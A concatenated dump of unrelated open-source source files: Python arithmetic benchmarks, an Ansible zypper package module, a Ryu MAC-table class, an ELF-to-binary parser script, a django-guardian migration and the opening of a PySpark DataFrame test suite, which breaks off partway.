c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2
b = 3
c = 3.14159
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
def calibrate(self):
for i in range(self.rounds):
pass
class SimpleLongArithmetic(Test):
version = 2.0
operations = 5 * (3 + 5 + 5 + 3 + 3 + 3)
rounds = 60000
def test(self):
for i in range(self.rounds):
a = 2220001
b = 100001
c = 30005
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2220001
b = 100001
c = 30005
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2220001
b = 100001
c = 30005
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2220001
b = 100001
c = 30005
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2220001
b = 100001
c = 30005
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
def calibrate(self):
for i in range(self.rounds):
pass
class SimpleComplexArithmetic(Test):
version = 2.0
operations = 5 * (3 + 5 + 5 + 3 + 3 + 3)
rounds = 80000
def test(self):
for i in range(self.rounds):
a = 2 + 3j
b = 2.5 + 4.5j
c = 1.2 + 6.2j
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2 + 3j
b = 2.5 + 4.5j
c = 1.2 + 6.2j
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2 + 3j
b = 2.5 + 4.5j
c = 1.2 + 6.2j
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2 + 3j
b = 2.5 + 4.5j
c = 1.2 + 6.2j
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2 + 3j
b = 2.5 + 4.5j
c = 1.2 + 6.2j
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
def calibrate(self):
for i in range(self.rounds):
pass
| bsd-3-clause |
open-synergy/purchase-workflow | purchase_multi_picking/__init__.py | 54 | 1048 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2012-2013 Agile Business Group sagl
# (<http://www.agilebg.com>)
# Copyright (C) 2012 Domsense srl (<http://www.domsense.com>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from . import purchase
| agpl-3.0 |
sebastiandev/plyse | plyse/tests/query_tree_test.py | 1 | 1769 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import unittest
from plyse.query_tree import Operand, And, Or, Not, NotOperatorError
class QueryTreeTester(unittest.TestCase):
def setUp(self):
self.o1 = {'field': 'dummy', 'field_type': 'string', 'val': 'test', 'val_type': 'string'}
self.o2 = {'field': 'dummy', 'field_type': 'string', 'val': 'test', 'val_type': 'string'}
def test_operand_node(self):
o = Operand(**self.o1)
self.assertTrue(o.is_leaf)
self.assertEqual([], o.children)
self.assertEqual(self.o1, o.leaves()[0])
def assert_node(self, op):
self.assertTrue(not op.is_leaf)
if op.type == Not.type:
self.assertEqual(1, len(op.inputs))
self.assertEqual(self.o1, op.children[0])
self.assertRaises(NotOperatorError, op.add_input, Operand(**self.o1))
else:
self.assertEqual(2, len(op.inputs))
self.assertEqual(self.o1, op.children[0])
self.assertEqual(self.o2, op.children[1])
op.add_input(Operand(**self.o1))
self.assertEqual(3, len(op.leaves()))
self.assertEqual(Operand, type(op.children[0]))
self.assertEqual(type(op), type(op.children[1]))
def test_or_operator_node(self):
o1 = Operand(**self.o1)
o2 = Operand(**self.o2)
or_op = Or([o1, o2])
self.assert_node(or_op)
def test_and_operator_node(self):
o1 = Operand(**self.o1)
o2 = Operand(**self.o2)
and_op = And([o1, o2])
self.assert_node(and_op)
def test_not_operator_node(self):
o1 = Operand(**self.o1)
not_op = Not([o1])
self.assert_node(not_op)
if __name__ == '__main__':
unittest.main()
| mit |
astorije/ansible-modules-extras | packaging/os/zypper.py | 49 | 10899 | #!/usr/bin/python -tt
# -*- coding: utf-8 -*-
# (c) 2013, Patrick Callahan <pmc@patrickcallahan.com>
# based on
# openbsd_pkg
# (c) 2013
# Patrik Lundin <patrik.lundin.swe@gmail.com>
#
# yum
# (c) 2012, Red Hat, Inc
# Written by Seth Vidal <skvidal at fedoraproject.org>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
import re
DOCUMENTATION = '''
---
module: zypper
author:
- "Patrick Callahan (@dirtyharrycallahan)"
- "Alexander Gubin (@alxgu)"
version_added: "1.2"
short_description: Manage packages on SUSE and openSUSE
description:
- Manage packages on SUSE and openSUSE using the zypper and rpm tools.
options:
name:
description:
- package name or package specifier with version C(name) or C(name-1.0). You can also pass a url or a local path to a rpm file.
required: true
aliases: [ 'pkg' ]
state:
description:
- C(present) will make sure the package is installed.
C(latest) will make sure the latest version of the package is installed.
C(absent) will make sure the specified package is not installed.
required: false
choices: [ present, latest, absent ]
default: "present"
type:
description:
- The type of package to be operated on.
required: false
choices: [ package, patch, pattern, product, srcpackage ]
default: "package"
version_added: "2.0"
disable_gpg_check:
description:
- Whether to disable to GPG signature checking of the package
signature being installed. Has an effect only if state is
I(present) or I(latest).
required: false
default: "no"
choices: [ "yes", "no" ]
aliases: []
disable_recommends:
version_added: "1.8"
description:
- Corresponds to the C(--no-recommends) option for I(zypper). Default behavior (C(yes)) modifies zypper's default behavior; C(no) does install recommended packages.
required: false
default: "yes"
choices: [ "yes", "no" ]
notes: []
# informational: requirements for nodes
requirements: [ zypper, rpm ]
author: Patrick Callahan
'''
EXAMPLES = '''
# Install "nmap"
- zypper: name=nmap state=present
# Install apache2 with recommended packages
- zypper: name=apache2 state=present disable_recommends=no
# Remove the "nmap" package
- zypper: name=nmap state=absent
# Install the nginx rpm from a remote repo
- zypper: name=http://nginx.org/packages/sles/12/x86_64/RPMS/nginx-1.8.0-1.sles12.ngx.x86_64.rpm state=present
# Install local rpm file
- zypper: name=/tmp/fancy-software.rpm state=present
'''
# Function used for getting zypper version
def zypper_version(module):
"""Return (rc, message) tuple"""
cmd = ['/usr/bin/zypper', '-V']
rc, stdout, stderr = module.run_command(cmd, check_rc=False)
if rc == 0:
return rc, stdout
else:
return rc, stderr
# Function used for getting versions of currently installed packages.
def get_current_version(m, packages):
cmd = ['/bin/rpm', '-q', '--qf', '%{NAME} %{VERSION}-%{RELEASE}\n']
cmd.extend(packages)
rc, stdout, stderr = m.run_command(cmd, check_rc=False)
current_version = {}
rpmoutput_re = re.compile('^(\S+) (\S+)$')
for stdoutline in stdout.splitlines():
match = rpmoutput_re.match(stdoutline)
if match == None:
return None
package = match.group(1)
version = match.group(2)
current_version[package] = version
for package in packages:
if package not in current_version:
print package + ' was not returned by rpm \n'
return None
return current_version
# Function used to find out if a package is currently installed.
def get_package_state(m, packages):
for i in range(0, len(packages)):
# Check state of a local rpm-file
if ".rpm" in packages[i]:
# Check if rpm file is available
package = packages[i]
if not os.path.isfile(package) and not '://' in package:
stderr = "No Package file matching '%s' found on system" % package
m.fail_json(msg=stderr)
# Get packagename from rpm file
cmd = ['/bin/rpm', '--query', '--qf', '%{NAME}', '--package']
cmd.append(package)
rc, stdout, stderr = m.run_command(cmd, check_rc=False)
packages[i] = stdout
cmd = ['/bin/rpm', '--query', '--qf', 'package %{NAME} is installed\n']
cmd.extend(packages)
rc, stdout, stderr = m.run_command(cmd, check_rc=False)
installed_state = {}
rpmoutput_re = re.compile('^package (\S+) (.*)$')
for stdoutline in stdout.splitlines():
match = rpmoutput_re.match(stdoutline)
if match == None:
return None
package = match.group(1)
result = match.group(2)
if result == 'is installed':
installed_state[package] = True
else:
installed_state[package] = False
for package in packages:
if package not in installed_state:
print package + ' was not returned by rpm \n'
return None
return installed_state
# Function used to make sure a package is present.
def package_present(m, name, installed_state, package_type, disable_gpg_check, disable_recommends, old_zypper):
packages = []
for package in name:
if installed_state[package] is False:
packages.append(package)
if len(packages) != 0:
cmd = ['/usr/bin/zypper', '--non-interactive']
# add global options before zypper command
if disable_gpg_check:
cmd.append('--no-gpg-checks')
cmd.extend(['install', '--auto-agree-with-licenses', '-t', package_type])
# add install parameter
if disable_recommends and not old_zypper:
cmd.append('--no-recommends')
cmd.extend(packages)
rc, stdout, stderr = m.run_command(cmd, check_rc=False)
if rc == 0:
changed=True
else:
changed=False
else:
rc = 0
stdout = ''
stderr = ''
changed=False
return (rc, stdout, stderr, changed)
# Function used to make sure a package is the latest available version.
def package_latest(m, name, installed_state, package_type, disable_gpg_check, disable_recommends, old_zypper):
# first of all, make sure all the packages are installed
(rc, stdout, stderr, changed) = package_present(m, name, installed_state, package_type, disable_gpg_check, disable_recommends, old_zypper)
# if we've already made a change, we don't have to check whether a version changed
if not changed:
pre_upgrade_versions = get_current_version(m, name)
cmd = ['/usr/bin/zypper', '--non-interactive']
if disable_gpg_check:
cmd.append('--no-gpg-checks')
if old_zypper:
cmd.extend(['install', '--auto-agree-with-licenses', '-t', package_type])
else:
cmd.extend(['update', '--auto-agree-with-licenses', '-t', package_type])
cmd.extend(name)
rc, stdout, stderr = m.run_command(cmd, check_rc=False)
# if we've already made a change, we don't have to check whether a version changed
if not changed:
post_upgrade_versions = get_current_version(m, name)
if pre_upgrade_versions != post_upgrade_versions:
changed = True
return (rc, stdout, stderr, changed)
# Function used to make sure a package is not installed.
def package_absent(m, name, installed_state, package_type, old_zypper):
packages = []
for package in name:
if installed_state[package] is True:
packages.append(package)
if len(packages) != 0:
cmd = ['/usr/bin/zypper', '--non-interactive', 'remove', '-t', package_type]
cmd.extend(packages)
rc, stdout, stderr = m.run_command(cmd)
if rc == 0:
changed=True
else:
changed=False
else:
rc = 0
stdout = ''
stderr = ''
changed=False
return (rc, stdout, stderr, changed)
# ===========================================
# Main control flow
def main():
module = AnsibleModule(
argument_spec = dict(
name = dict(required=True, aliases=['pkg'], type='list'),
state = dict(required=False, default='present', choices=['absent', 'installed', 'latest', 'present', 'removed']),
type = dict(required=False, default='package', choices=['package', 'patch', 'pattern', 'product', 'srcpackage']),
disable_gpg_check = dict(required=False, default='no', type='bool'),
disable_recommends = dict(required=False, default='yes', type='bool'),
),
supports_check_mode = False
)
params = module.params
name = params['name']
state = params['state']
type_ = params['type']
disable_gpg_check = params['disable_gpg_check']
disable_recommends = params['disable_recommends']
rc = 0
stdout = ''
stderr = ''
result = {}
result['name'] = name
result['state'] = state
rc, out = zypper_version(module)
match = re.match(r'zypper\s+(\d+)\.(\d+)\.(\d+)', out)
if not match or int(match.group(1)) > 0:
old_zypper = False
else:
old_zypper = True
# Get package state
installed_state = get_package_state(module, name)
# Perform requested action
if state in ['installed', 'present']:
(rc, stdout, stderr, changed) = package_present(module, name, installed_state, type_, disable_gpg_check, disable_recommends, old_zypper)
elif state in ['absent', 'removed']:
(rc, stdout, stderr, changed) = package_absent(module, name, installed_state, type_, old_zypper)
elif state == 'latest':
(rc, stdout, stderr, changed) = package_latest(module, name, installed_state, type_, disable_gpg_check, disable_recommends, old_zypper)
if rc != 0:
if stderr:
module.fail_json(msg=stderr)
else:
module.fail_json(msg=stdout)
result['changed'] = changed
module.exit_json(**result)
# import module snippets
from ansible.module_utils.basic import *
main()
| gpl-3.0 |
09zwcbupt/ryu | ryu/controller/mac_to_port.py | 63 | 1898 | # Copyright (C) 2011 Nippon Telegraph and Telephone Corporation.
# Copyright (C) 2011 Isaku Yamahata <yamahata at valinux co jp>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from ryu.lib.mac import haddr_to_str
LOG = logging.getLogger('ryu.controller.mac_to_port')
class MacToPortTable(object):
"""MAC addr <-> (dpid, port name)"""
def __init__(self):
super(MacToPortTable, self).__init__()
self.mac_to_port = {}
def dpid_add(self, dpid):
LOG.debug('dpid_add: 0x%016x', dpid)
self.mac_to_port.setdefault(dpid, {})
def port_add(self, dpid, port, mac):
"""
:returns: old port if learned. (this may be = port)
None otherwise
"""
old_port = self.mac_to_port[dpid].get(mac, None)
self.mac_to_port[dpid][mac] = port
if old_port is not None and old_port != port:
LOG.debug('port_add: 0x%016x 0x%04x %s',
dpid, port, haddr_to_str(mac))
return old_port
def port_get(self, dpid, mac):
# LOG.debug('dpid 0x%016x mac %s', dpid, haddr_to_str(mac))
return self.mac_to_port[dpid].get(mac)
def mac_list(self, dpid, port):
return [mac for (mac, port_) in self.mac_to_port.get(dpid).items()
if port_ == port]
def mac_del(self, dpid, mac):
del self.mac_to_port[dpid][mac]
| apache-2.0 |
izard/RTBench | tools/src/baremetal/smallos/scripts/parser.py | 1 | 7293 | #!/usr/bin/python
#;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
#
# Copyright (c) 2001-2009, Intel Corporation
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the Intel Corporation nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import os, sys
import re
import getopt
VERSION=0.15
class SegmentError(Exception):
def __init__(self,value):
self.value = value
def __str__(self):
return repr(self.value)
class Segmant(object):
name = ""
elf_type = ""
phyAddr = 0
offset = 0
size = 0
es = ""
flg = ""
lk = 0
inf = 0
al = 0
hexdata = list()
header = list()
def __init__(self,args):
self.name = args[0]
self.elf_type = args[1]
self.phyAddr = int(args[2],16)
self.offset = int(args[3],16)
self.size = int(args[4],16)
self.es = args[5]
self.flg = args[6]
self.lk = int(args[7],10)
self.inf = int(args[8],10)
self.al = int(args[9],10)
def isAlloc(self):
return ('A' in self.flg)
def isMerge(self):
return ('M' in self.flg)
def __str__(self):
return self.name
def getHeader(self,kernel='kernel'):
data = []
if(len(self.header) == 0):
buf = self.getBin(kernel)
lines = len(buf)
if(lines <= 256):
#self.header.append('/origin %08x\n' % self.phyAddr)
data.append('/origin %08x\n' % self.phyAddr)
else:
count = 0
#round up
#final = lines/256 + (0 if (lines%256 == 0) else 1)
final = lines/256 + ({True: 0, False: 1}[lines%256 == 0])
while(count < final):
#self.header.append('/origin %08x\n' % \
# (self.phyAddr+count*4096))
data.append('/origin %08x\n' % (self.phyAddr+count*4096))
count += 1
self.header = data
return self.header
def getBin(self,kernel='kernel'):
if(not self.isAlloc()):
raise SegmentError("Can't generate bin data on non-allocated sect.")
if(len(self.hexdata) == 0):
cmd = 'hexdump -v -s %d -n %d' % (self.offset,self.size)
cmd += ' -e \'16/1 "%02X " "\n"\''
cmd += ' ' + kernel
f = os.popen(cmd)
self.hexdata = f.readlines()
f.close()
return self.hexdata
class binary(object):
def combine(self,msegs):
args = (
','.join([seg.name for seg in msegs]),
msegs[0].elf_type,
str(hex(msegs[0].phyAddr)),
str(hex(msegs[0].offset)),
str(hex(sum(seg.size for seg in msegs))),
msegs[0].es,
msegs[0].flg.replace('M',''),
str(msegs[0].lk),
str(msegs[0].inf),
str(msegs[0].al)
)
return Segmant(args)
def process(self):
merge = []
for s in self.segs:
try:
if(s.isAlloc()):
if(s.isMerge()):
merge.append(s)
else:
if(len(merge) != 0):
self.toFile(self.combine(merge))
merge = []
self.toFile(s)
except SegmentError, e:
#print >> self.log_stream, "SegmangError:%s" % (str(e))
pass
def toFile(self,seg):
header = seg.getHeader()
print >> self.log_stream, seg.name + str(header)
data = seg.getBin()
count = 0
out = open(self.outName,'a')
if(len(header) > 1):
for l in header[:-1]:
out.write(l)
for ll in data[count*256:(count+1)*256]:
out.write(ll)
count += 1
out.write(header[-1])
for ll in data[count*256:]:
out.write(ll)
out.close()
def __init__(self,inF='kernel',outF='linux_boot/smallOS.bin',log=sys.stdout):
self.log_stream = log
print >> self.log_stream, "LWRTE Parser %1.2f, inFile:%s, outFile:%s" % (VERSION,inF, outF)
self.segs = list()
self.inName = inF
self.outName = outF
def clean(self):
if(os.path.exists(self.outName)):
print >> self.log_stream, "Cleaning old file:%s" % (self.outName)
os.remove(self.outName)
def build(self,buf):
for l in buf:
try:
buf=re.split('\s+',l.split('] ')[1])[:-1]
if(len(buf)==10):
self.segs.append(Segmant(buf))
except IndexError, e:
#print >> self.log_stream, "IndexError:%s" % (str(e))
pass
except ValueError, e:
#print >> self.log_stream, "ValueError:%s" % (str(e))
pass
def start(self):
buf=os.popen('readelf -S -W %s' % (self.inName)).readlines()
self.clean()
self.build(buf)
self.process()
if __name__ == "__main__":
try:
opts, args = getopt.getopt(sys.argv[1:], "i:o:", ["input=","output="])
outFile = None
inFile = None
for o, a in opts:
if (o in ("-i", "--input")):
inFile = a
elif(o in ("-o", "--output")):
outFile = a
else:
assert False, "unhandled option"
if(not None in (outFile, inFile)):
log_stream = sys.stdout
#log_stream = open('log.txt','w')
binary(inFile,outFile,log_stream).start()
log_stream.close()
except getopt.GetoptError, err:
print str(err)
sys.exit(2)
| bsd-3-clause |
wvolz/django-guardian | guardian/migrations/0002_auto__add_field_groupobjectpermission_object_pk__add_field_userobjectp.py | 85 | 5650 | # encoding: utf-8
from south.db import db
from south.v2 import SchemaMigration
from guardian.compat import user_model_label
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'GroupObjectPermission.object_pk'
db.add_column('guardian_groupobjectpermission', 'object_pk', self.gf('django.db.models.fields.TextField')(default=''), keep_default=False)
# Adding field 'UserObjectPermission.object_pk'
db.add_column('guardian_userobjectpermission', 'object_pk', self.gf('django.db.models.fields.TextField')(default=''), keep_default=False)
def backwards(self, orm):
# Deleting field 'GroupObjectPermission.object_pk'
db.delete_column('guardian_groupobjectpermission', 'object_pk')
# Deleting field 'UserObjectPermission.object_pk'
db.delete_column('guardian_userobjectpermission', 'object_pk')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
user_model_label: {
'Meta': {'object_name': user_model_label.split('.')[-1]},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'guardian.groupobjectpermission': {
'Meta': {'unique_together': "(['group', 'permission', 'content_type', 'object_id'],)", 'object_name': 'GroupObjectPermission'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'object_pk': ('django.db.models.fields.TextField', [], {'default': "''"}),
'permission': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.Permission']"})
},
'guardian.userobjectpermission': {
'Meta': {'unique_together': "(['user', 'permission', 'content_type', 'object_id'],)", 'object_name': 'UserObjectPermission'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'object_pk': ('django.db.models.fields.TextField', [], {'default': "''"}),
'permission': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.Permission']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['%s']" % user_model_label})
}
}
complete_apps = ['guardian']
| bsd-2-clause |
zzcclp/spark | python/pyspark/sql/tests/test_dataframe.py | 9 | 42005 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import pydoc
import shutil
import tempfile
import time
import unittest
from pyspark.sql import SparkSession, Row
from pyspark.sql.types import StringType, IntegerType, DoubleType, StructType, StructField, \
BooleanType, DateType, TimestampType, FloatType
from pyspark.sql.utils import AnalysisException, IllegalArgumentException
from pyspark.testing.sqlutils import ReusedSQLTestCase, SQLTestUtils, have_pyarrow, have_pandas, \
pandas_requirement_message, pyarrow_requirement_message
from pyspark.testing.utils import QuietTest
class DataFrameTests(ReusedSQLTestCase):
def test_range(self):
self.assertEqual(self.spark.range(1, 1).count(), 0)
self.assertEqual(self.spark.range(1, 0, -1).count(), 1)
self.assertEqual(self.spark.range(0, 1 << 40, 1 << 39).count(), 2)
self.assertEqual(self.spark.range(-2).count(), 0)
self.assertEqual(self.spark.range(3).count(), 3)
def test_duplicated_column_names(self):
df = self.spark.createDataFrame([(1, 2)], ["c", "c"])
row = df.select('*').first()
self.assertEqual(1, row[0])
self.assertEqual(2, row[1])
self.assertEqual("Row(c=1, c=2)", str(row))
# Cannot access columns
self.assertRaises(AnalysisException, lambda: df.select(df[0]).first())
self.assertRaises(AnalysisException, lambda: df.select(df.c).first())
self.assertRaises(AnalysisException, lambda: df.select(df["c"]).first())
def test_freqItems(self):
vals = [Row(a=1, b=-2.0) if i % 2 == 0 else Row(a=i, b=i * 1.0) for i in range(100)]
df = self.sc.parallelize(vals).toDF()
items = df.stat.freqItems(("a", "b"), 0.4).collect()[0]
self.assertTrue(1 in items[0])
self.assertTrue(-2.0 in items[1])
def test_help_command(self):
# Regression test for SPARK-5464
rdd = self.sc.parallelize(['{"foo":"bar"}', '{"foo":"baz"}'])
df = self.spark.read.json(rdd)
# render_doc() reproduces the help() exception without printing output
pydoc.render_doc(df)
pydoc.render_doc(df.foo)
pydoc.render_doc(df.take(1))
def test_dropna(self):
schema = StructType([
StructField("name", StringType(), True),
StructField("age", IntegerType(), True),
StructField("height", DoubleType(), True)])
# shouldn't drop a non-null row
self.assertEqual(self.spark.createDataFrame(
[(u'Alice', 50, 80.1)], schema).dropna().count(),
1)
# dropping rows with a single null value
self.assertEqual(self.spark.createDataFrame(
[(u'Alice', None, 80.1)], schema).dropna().count(),
0)
self.assertEqual(self.spark.createDataFrame(
[(u'Alice', None, 80.1)], schema).dropna(how='any').count(),
0)
# if how = 'all', only drop rows if all values are null
self.assertEqual(self.spark.createDataFrame(
[(u'Alice', None, 80.1)], schema).dropna(how='all').count(),
1)
self.assertEqual(self.spark.createDataFrame(
[(None, None, None)], schema).dropna(how='all').count(),
0)
# how and subset
self.assertEqual(self.spark.createDataFrame(
[(u'Alice', 50, None)], schema).dropna(how='any', subset=['name', 'age']).count(),
1)
self.assertEqual(self.spark.createDataFrame(
[(u'Alice', None, None)], schema).dropna(how='any', subset=['name', 'age']).count(),
0)
# threshold
self.assertEqual(self.spark.createDataFrame(
[(u'Alice', None, 80.1)], schema).dropna(thresh=2).count(),
1)
self.assertEqual(self.spark.createDataFrame(
[(u'Alice', None, None)], schema).dropna(thresh=2).count(),
0)
# threshold and subset
self.assertEqual(self.spark.createDataFrame(
[(u'Alice', 50, None)], schema).dropna(thresh=2, subset=['name', 'age']).count(),
1)
self.assertEqual(self.spark.createDataFrame(
[(u'Alice', None, 180.9)], schema).dropna(thresh=2, subset=['name', 'age']).count(),
0)
# thresh should take precedence over how
self.assertEqual(self.spark.createDataFrame(
[(u'Alice', 50, None)], schema).dropna(
how='any', thresh=2, subset=['name', 'age']).count(),
1)
def test_fillna(self):
schema = StructType([
StructField("name", StringType(), True),
StructField("age", IntegerType(), True),
StructField("height", DoubleType(), True),
StructField("spy", BooleanType(), True)])
